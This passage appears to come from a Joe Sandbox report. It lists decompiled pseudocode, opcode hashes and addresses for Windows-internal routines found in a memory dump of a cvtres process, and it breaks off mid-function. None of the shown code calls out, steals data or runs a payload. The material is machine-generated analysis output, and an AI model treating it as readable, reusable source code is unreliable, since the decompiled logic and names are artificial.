                                                                        0x0567402b
                                                                        0x0567402f
                                                                        0x05674043
                                                                        0x05674046
                                                                        0x05674051
                                                                        0x05674057
                                                                        0x0567405f
                                                                        0x05674062
                                                                        0x05674067
                                                                        0x0567406f
                                                                        0x0567407c
                                                                        0x0567407c
                                                                        0x0567408c
                                                                        0x0567408c
                                                                        0x05674097

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 779e750793d336baf36c432e4f30548ea276e108a97054257a8ee6ea59ed5d18
                                                                        • Instruction ID: 15472facac074161b2596bf64a0fdb8d8f7480c17f154358ade7a4cc86387b7f
                                                                        • Opcode Fuzzy Hash: 779e750793d336baf36c432e4f30548ea276e108a97054257a8ee6ea59ed5d18
                                                                        • Instruction Fuzzy Hash: 0201847230154A7FD611AFA9CD88E57BBACFF89760B000269B50887A11DB24EC51CAE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 056614FB Relevance: .0, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 61%
                                                                        			E056614FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x569d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E055EFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E055C7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E055EB640(E055E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                        0x056614fb
                                                                        0x056614fb
                                                                        0x0566150a
                                                                        0x05661514
                                                                        0x05661519
                                                                        0x0566151b
                                                                        0x05661526
                                                                        0x0566152c
                                                                        0x05661534
                                                                        0x05661537
                                                                        0x0566153a
                                                                        0x05661545
                                                                        0x05661557
                                                                        0x05661547
                                                                        0x05661550
                                                                        0x05661550
                                                                        0x05661562
                                                                        0x05661563
                                                                        0x05661565
                                                                        0x0566156a
                                                                        0x0566157f

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: effc412600eb1d331909f335a6e4f97c0063e04f2a9be1c71b2ddfa6af3b5332
                                                                        • Instruction ID: 4fe56abf3fd7f1f97c65b94f2313e0de88d68b754fa44608dbb17e08924c6d2d
                                                                        • Opcode Fuzzy Hash: effc412600eb1d331909f335a6e4f97c0063e04f2a9be1c71b2ddfa6af3b5332
                                                                        • Instruction Fuzzy Hash: E5019671A00249AFCB04DF68D846EAEBBB8FF85710F40405AF905EB340DA70DA00CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0566138A Relevance: .0, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 61%
                                                                        			E0566138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x569d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E055EFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E055C7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E055EB640(E055E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                        0x0566138a
                                                                        0x0566138a
                                                                        0x05661399
                                                                        0x056613a3
                                                                        0x056613a8
                                                                        0x056613aa
                                                                        0x056613b5
                                                                        0x056613bb
                                                                        0x056613c3
                                                                        0x056613c6
                                                                        0x056613c9
                                                                        0x056613d4
                                                                        0x056613e6
                                                                        0x056613d6
                                                                        0x056613df
                                                                        0x056613df
                                                                        0x056613f1
                                                                        0x056613f2
                                                                        0x056613f4
                                                                        0x056613f9
                                                                        0x0566140e

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9ddbc2a17b3132f22d12c9bcb405d3e7cd3b24a210a5dab7ce68f94310827c6c
                                                                        • Instruction ID: 80e0190fe35129c8f275c947de29734781e8d47b669f4165a7f07b1f5e1ec3b2
                                                                        • Opcode Fuzzy Hash: 9ddbc2a17b3132f22d12c9bcb405d3e7cd3b24a210a5dab7ce68f94310827c6c
                                                                        • Instruction Fuzzy Hash: 41019671E00249AFCB04DFA8D846EAEBBB8FF85710F00405AF901EB740DA709E01C790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055A58EC Relevance: .0, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E055A58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x569d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x5585c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E055A5943() != 0 &&  *0x5695320 > 5) {
					E05627B5E( &_v44, _t27);
					_t22 =  &_v28;
					E05627B5E( &_v28, _t28);
					_t11 = E05627B9C(0x5695320, 0x558bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E055EB640(_t11, _t17, _v8 ^ _t29, 0x558bf15, _t27, _t28);
			}















                                                                        0x055a58fb
                                                                        0x055a58fe
                                                                        0x055a5906
                                                                        0x055a590a
                                                                        0x055a593c
                                                                        0x055a593c
                                                                        0x055a590c
                                                                        0x055a590c
                                                                        0x055a5911
                                                                        0x00000000
                                                                        0x055a5913
                                                                        0x055a5913
                                                                        0x055a5913
                                                                        0x055a5911
                                                                        0x055a591d
                                                                        0x05601035
                                                                        0x0560103c
                                                                        0x0560103f
                                                                        0x05601056
                                                                        0x05601056
                                                                        0x055a593b

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5703d19dd751a329e1313ca88c5100938f1b640da7159643de6b0fa7d3394794
                                                                        • Instruction ID: 9e50d70755d163ee6ae4bddd1b09f855a1f559b619415ed1ff229653e73f5375
                                                                        • Opcode Fuzzy Hash: 5703d19dd751a329e1313ca88c5100938f1b640da7159643de6b0fa7d3394794
                                                                        • Instruction Fuzzy Hash: FB018432B14518AFCB14EE29D845DAF77BDFF81630F940069A906AB245EE30DD02CE94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0565FE3F Relevance: .0, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 59%
                                                                        			E0565FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x569d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E055EFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E055C7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E055EB640(E055E9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                        0x0565fe3f
                                                                        0x0565fe3f
                                                                        0x0565fe4e
                                                                        0x0565fe58
                                                                        0x0565fe5d
                                                                        0x0565fe5f
                                                                        0x0565fe6a
                                                                        0x0565fe72
                                                                        0x0565fe75
                                                                        0x0565fe78
                                                                        0x0565fe83
                                                                        0x0565fe95
                                                                        0x0565fe85
                                                                        0x0565fe8e
                                                                        0x0565fe8e
                                                                        0x0565fea0
                                                                        0x0565fea1
                                                                        0x0565fea3
                                                                        0x0565fea8
                                                                        0x0565febd

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6370dd498be8ee2cf63e9527c5e170c26771822883522db09768d625dcc3cc87
                                                                        • Instruction ID: a36517b803528d54ee523079e16ace6b4d5e19cbc2d71fd7ddfa54dd284d5c89
                                                                        • Opcode Fuzzy Hash: 6370dd498be8ee2cf63e9527c5e170c26771822883522db09768d625dcc3cc87
                                                                        • Instruction Fuzzy Hash: 35018471A00209AFCB14DFA9D846FAEBBB8FF84710F00406AF901AB781DE709901C795
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0565FEC0 Relevance: .0, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 59%
                                                                        			E0565FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x569d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E055EFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E055C7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E055EB640(E055E9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                        0x0565fec0
                                                                        0x0565fec0
                                                                        0x0565fecf
                                                                        0x0565fed9
                                                                        0x0565fede
                                                                        0x0565fee0
                                                                        0x0565feeb
                                                                        0x0565fef3
                                                                        0x0565fef6
                                                                        0x0565fef9
                                                                        0x0565ff04
                                                                        0x0565ff16
                                                                        0x0565ff06
                                                                        0x0565ff0f
                                                                        0x0565ff0f
                                                                        0x0565ff21
                                                                        0x0565ff22
                                                                        0x0565ff24
                                                                        0x0565ff29
                                                                        0x0565ff3e

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 464fa249dc276438cef3a2c7c066f3392e467f0c99403a4d875862b5305c9202
                                                                        • Instruction ID: ba86b76f156f4cdb09b4da912641f6fb4b31caf9490368a9c585c95982ff4fa1
                                                                        • Opcode Fuzzy Hash: 464fa249dc276438cef3a2c7c066f3392e467f0c99403a4d875862b5305c9202
                                                                        • Instruction Fuzzy Hash: 2C0188B1A00249AFCB14DFA9D846FAEBBB8FF85710F40406AF9019B780D9709901C795
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05671074 Relevance: .0, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E05671074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0567165E(__ebx, 0x5698ae4, (__edx -  *0x5698b04 >> 0x14) + (__edx -  *0x5698b04 >> 0x14), __edi, __ecx, (__edx -  *0x5698b04 >> 0x14) + (__edx -  *0x5698b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0566AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E055C7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0565FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                                        0x05671074
                                                                        0x05671080
                                                                        0x05671082
                                                                        0x0567108a
                                                                        0x0567108f
                                                                        0x05671093
                                                                        0x056710ab
                                                                        0x056710ab
                                                                        0x056710c3
                                                                        0x056710cf
                                                                        0x056710e1
                                                                        0x056710d1
                                                                        0x056710da
                                                                        0x056710da
                                                                        0x056710e9
                                                                        0x056710f5
                                                                        0x056710f5
                                                                        0x056710fe

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7df29543e494eb77c233eddbcce1a9ef8e94e0eb5c5def3f31fa387d398ab8c2
                                                                        • Instruction ID: ac1dc4934c0f5498e601b635abbe0b553de7215c73be5e8281b9bdd963d40d22
                                                                        • Opcode Fuzzy Hash: 7df29543e494eb77c233eddbcce1a9ef8e94e0eb5c5def3f31fa387d398ab8c2
                                                                        • Instruction Fuzzy Hash: CE014C72604745DFC710EF68C944B1ABBE9BBC5310F04852EF88693791DE30D545CB96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055BB02A Relevance: .0, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055BB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E055C7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E05627016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                        0x055bb037
                                                                        0x055bb039
                                                                        0x055bb03b
                                                                        0x055bb040
                                                                        0x0560a60e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0560a61d
                                                                        0x055bb04b
                                                                        0x055bb04e
                                                                        0x0560a627
                                                                        0x0560a634
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0560a641
                                                                        0x0560a653
                                                                        0x0560a643
                                                                        0x0560a64c
                                                                        0x0560a64c
                                                                        0x0560a65b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0560a66c
                                                                        0x055bb057
                                                                        0x055bb057
                                                                        0x055bb057
                                                                        0x055bb046
                                                                        0x055bb046
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                        • Instruction ID: eea75b6aade8c8809d1e3f5e9c176b5433bee160c8b972dd2eb1d9204cd419c5
                                                                        • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                        • Instruction Fuzzy Hash: 66018471214A84DFE326C75CC988FB777E9FB45790F0900A5F916CBA91D6A8EC80C661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05678ED6 Relevance: .0, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 54%
                                                                        			E05678ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x569d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E055C7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E055EB640(E055E9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                                        0x05678ed6
                                                                        0x05678ee5
                                                                        0x05678eed
                                                                        0x05678ef0
                                                                        0x05678efa
                                                                        0x05678f03
                                                                        0x05678f0c
                                                                        0x05678f15
                                                                        0x05678f24
                                                                        0x05678f27
                                                                        0x05678f31
                                                                        0x05678f43
                                                                        0x05678f33
                                                                        0x05678f3c
                                                                        0x05678f3c
                                                                        0x05678f4e
                                                                        0x05678f4f
                                                                        0x05678f51
                                                                        0x05678f56
                                                                        0x05678f69

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eda64098fbf6d2cfa0c578218d4b2798525c3a7c8aa47fd2b32eb4d66b467aae
                                                                        • Instruction ID: 8a46fb5f3d6250c59361c091e628e6d662e6cb27b88aa86bc9cd8018c16518c1
                                                                        • Opcode Fuzzy Hash: eda64098fbf6d2cfa0c578218d4b2798525c3a7c8aa47fd2b32eb4d66b467aae
                                                                        • Instruction Fuzzy Hash: 1D111E70A0020A9FDB04DFA8D545BAEBBF4FF48300F0442AAE519EB782E6349940CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05678A62 Relevance: .0, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 54%
                                                                        			E05678A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x569d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E055C7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E055EB640(E055E9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                        0x05678a62
                                                                        0x05678a71
                                                                        0x05678a79
                                                                        0x05678a82
                                                                        0x05678a85
                                                                        0x05678a89
                                                                        0x05678a8c
                                                                        0x05678a8f
                                                                        0x05678a92
                                                                        0x05678a95
                                                                        0x05678a9f
                                                                        0x05678ab1
                                                                        0x05678aa1
                                                                        0x05678aaa
                                                                        0x05678aaa
                                                                        0x05678abc
                                                                        0x05678abd
                                                                        0x05678abf
                                                                        0x05678ac4
                                                                        0x05678ada

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 352b4aa6ed34ac8ef30ece4080a4261543592cab0b0dad9efb62c81f94157329
                                                                        • Instruction ID: bd34f51e387c9fb44820f2b6affb78c2dc735af7ec5a303aaf89bd8aa5030db4
                                                                        • Opcode Fuzzy Hash: 352b4aa6ed34ac8ef30ece4080a4261543592cab0b0dad9efb62c81f94157329
                                                                        • Instruction Fuzzy Hash: 58012CB1A0021DAFCB04DFA9D9459AEBBB8FF49310F10405AF905E7341DA34AD01CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055ADB60 Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055ADB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E055ADB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E055AE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L055AE8B0(__ecx, _t14, 0xfff);
							L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                        0x055adb64
                                                                        0x055adb66
                                                                        0x055adb6b
                                                                        0x055adbaa
                                                                        0x055adb71
                                                                        0x055adb76
                                                                        0x055adb7a
                                                                        0x055adba3
                                                                        0x055adb7c
                                                                        0x055adb87
                                                                        0x055adb8b
                                                                        0x05604fa1
                                                                        0x05604fb3
                                                                        0x05604fb8
                                                                        0x055adb91
                                                                        0x055adb96
                                                                        0x055adb98
                                                                        0x055adb98
                                                                        0x055adb8b
                                                                        0x055adb7a
                                                                        0x055adb9d
                                                                        0x055adba2

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                        • Instruction ID: a59e7d3ac5a18286dd2afbcbb9cf76c08fd4e97d5c8e5f2dc08dc2f07b69f7dc
                                                                        • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                        • Instruction Fuzzy Hash: 6BF0FC33305527DFD7327A554888F2FB6BABFC1A60F150435F2059BB44CE648C028AD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055AB1E1 Relevance: .0, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055AB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E055C7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E055C7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E05627016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                        0x055ab1e8
                                                                        0x055ab1ea
                                                                        0x055ab1f3
                                                                        0x05604a17
                                                                        0x055ab1f9
                                                                        0x055ab1f9
                                                                        0x055ab1f9
                                                                        0x055ab201
                                                                        0x05604a21
                                                                        0x05604a2e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05604a3b
                                                                        0x05604a4d
                                                                        0x05604a3d
                                                                        0x05604a46
                                                                        0x05604a46
                                                                        0x05604a55
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055ab20a
                                                                        0x055ab20a
                                                                        0x055ab20a
                                                                        0x055ab20a

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                        • Instruction ID: 9cdf4dadd86c2a823d8cb4fa94142b605e78f3f22a6f37736211f2f5fa1a0a99
                                                                        • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                        • Instruction Fuzzy Hash: 9C01D6322045909FD736979DC808F6A7B99FF81765F0804A6FA168BAB2EE74CC00C755
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0563FE87 Relevance: .0, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 46%
                                                                        			E0563FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
